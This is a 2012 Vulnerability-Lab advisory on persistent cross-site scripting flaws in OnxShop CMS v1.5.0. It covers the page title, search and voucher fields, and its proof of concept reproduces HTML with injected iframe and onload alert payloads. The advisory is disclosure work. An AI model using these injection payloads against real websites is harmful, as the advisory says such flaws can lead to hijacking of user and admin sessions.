OnxShop CMS v1.5.0 - Multiple Web Vulnerabilities



Title:
======
OnxShop CMS v1.5.0 - Multiple Web Vulnerabilities


Date:
=====
2012-02-08


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=426


VL-ID:
=====
426


Introduction:
=============
Onxshop is not only great CMS offering integrated in-context editing and full design freedom without the constraints
of limiting templates, but it s also stable ecommerce platform used in production environment since 2006. Flexible layout
modules, which support nesting based on the Fibonacci sequence Complete HTML/CSS framework, which allows you to use the
same HTML and core CSS for multiple websites with different branding and designs.

Simplified MVC paradigm using Model = Storage Access (SQL and PHP), View = Presentation to client (simple HTML engine),
Controller = Handling actions (request processing in PHP to produce View).
To put it simply, you will not see the $align option in Model or Controller or the SQL query in Controller
Flexible routing system which allows each component to be called on its own (useful for AJAX)
The option to rewrite each template, model or controller specifically for a project, so developers can add their own
stamp to the system. Common components that are all built directly by our core team, which means that 99% of projects
don\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'t need to install external components. This eliminates problems with incompatible components (extensions/modules/plugins)
which affects some CMS software. Behavioural targeting support in the core system and many other components. An all in one system -
content management system, blog, product catalogue and checkout process all rolled into one. This allows users share the same
category system and media library across their product catalogue and blog articles, or include an “add to basket” button in
blog posts about a product. There isn t any other web system in the universe which can do this with such ease.
One fulltext search for the CMS, eCommerce and blog.

Onxshop is a new kind of Content Management System (Shop|eCommerce). Onxshop is currently used by more than 50
businesses around the world, and that figure is growing all the time.

(Copy of the Vendor Homepage: http://http://onxshop.com/)


Abstract:
=========
Vulnerability-Lab Team discovered multiple web vulnerabilities on Onxshops Content Management System v1.5.0


Report-Timeline:
================
2012-02-09: Public or Non-Public Disclosure


Status:
========
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
Multiple persistant input validation vulnerabilities are detected on on Onxshops Content Management System v1.5.0.
The bug allows remote attacker to implement malicious script code on the application side (persistent).
Successful exploitation of the vulnerability allows an attacker to manipulate modules/context (persistent) & can
lead to session hijacking (user/mod/admin).


Vulnerable Module(s):
[+] Pages - Title
[+] Search - Keywords & Inputs
[+] Vochou

Pictures:
../1.png
../2.png
../3.png


Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with medium required user inter action. For demonstration or reproduce ...

1.
<tr id="node_id_1194">
<td><a onclick="openEdit('/popup/properties/1194/orig/page/88')" href="javascript:void(1194)
" class="">">&#8203;&#8203;&#8203;&#8203;&#8203;<iframe a="" <<="" onload='alert("VulnerabilityLab")' src="a"></td>
<td>page/default</td>
<td>0</td>
<td>0</td>
<td><div class="onxshop_page_properties"><a class="onxshop_delete"
title="Delete default" href="#1194"><span>Delete</span></a></div></td></tr>
</tbody>
</table>


2.
<div id="breadCrumb">
<a href="/reports">Reports</a> <span style="font-size:8px;">></span><span class="location">
"><img src="http://www.vulnerability-lab.com/gfx/partners/vlab.png"; onLoad=alert(1337);></span> [X]
</div>

...or

<option value="all">All Orders</option></select>
</span>
</div><div class="row search">

<span class="label"><label>Search query</label></span>
<span class="field">
&#8203;&#8203;&#8203;&#8203;&#8203;<input width="800" type="text" height="800" src="http://vulnerability-lab.com"; <iframe=""
value=">" name="order-list-filter[query]" id="query"/>" /></span></div>

<div class="row registered_between">
<span class="label"><label>Created between</label></span>

<span class="field">
<input width="800" type="text" height="800" src="http://vulnerability-lab.com";
<iframe="" value=">" name="order-list-filter[created_from]" id="order-list-filter-created_from"
class="text hasDatepicker"/>" />
<input width="800" type="text" height="800"
src="http://vulnerability-lab.com"; <iframe="" value=">" name="order-list-filter[created_to]" id="order-list-
filter-created_to" class="text hasDatepicker"/>" /></span>&#8203;&#8203;&#8203;&#8203;&#8203;




3.
<tr class="disabled">
<td><a href="#promotionEdit" onclick="makeAjaxRequest('#promotionEdit',
'/request/bo/component/ecommerce/promotion_edit~id=2~');" title="Edit promotion settings">>"&#8203;&#8203;&#8203;&#8203;&#8203;
<iframe width="800" height="800" src="http://vulnerability-lab.com";></a></td>
<td>>"<iframe src=http://vulnerability-lab.com width=800 height=800></td>

<td class="number">0</td>
<td class="money">£0.00</td>
<td class="money">£0.00</td>
</tr>


Reference(s):
../pages.txt
../search.txt
../vouchers-name.txt


Risk:
=====
The security risk of the persistant input validation vulnerabilities are estimated as medium.


Credits:
========
Vulnerability Research Laboratory - N/A Anonymous


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012|Vulnerability-Lab

--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin@xxxxxxxxxxxxxxxxxxxxx or support@xxxxxxxxxxxxxxxxxxxxx



Relevant Pages

  • [Full-disclosure] OnxShop CMS v1.5.0 - Multiple Web Vulnerabilities
    ... OnxShop CMS v1.5.0 - Multiple Web Vulnerabilities ... Vulnerability-Lab Team discovered multiple web vulnerabilities on Onxshops Content Management System v1.5.0 ...
    (Full-Disclosure)
  • [Bkis-02-2010] Multiple Vulnerabilities in CMS Made Simple - Bkis
    ... CMS Made Simple is a free content management system written in PHP, ... In March, 2010, Bkis Security discovered some XSS and CSRF vulnerabilities in CMS Made Simple 1.7.1. ... Taking advantage of these vulnerabilities, hacker is able to insert pieces of code into the path's link to execute in user's browser, causing the loss of cookies and session. ...
    (Bugtraq)
  • [Full-disclosure] Vulnerabilities in LIOOSYS CMS
    ... I'm presenting you the vulnerabilities in LIOOSYS CMS - Polish commercial ... These are SQL Injection and Information Leakage vulnerabilities. ...
    (Full-Disclosure)
  • [Full-disclosure] XSS and CS vulnerabilities in DSMS
    ... There are Cross-Site Scripting and Content Spoofing vulnerabilities in DSMS. ... This is commercial CMS. ... It's used particularly at government site dsmsu.gov.ua - web site of Ministry of Youth and Sport of Ukraine. ... There are also other vulnerabilities in the system, ...
    (Full-Disclosure)
  • [Full-disclosure] Vulnerabilities in AltConstructor
    ... It's Ukrainian commercial CMS. ... Vulnerable are all versions of CMS AltConstructor, ... where developers fixed holes after my informing. ... I mentioned about these vulnerabilities at my site ...
    (Full-Disclosure)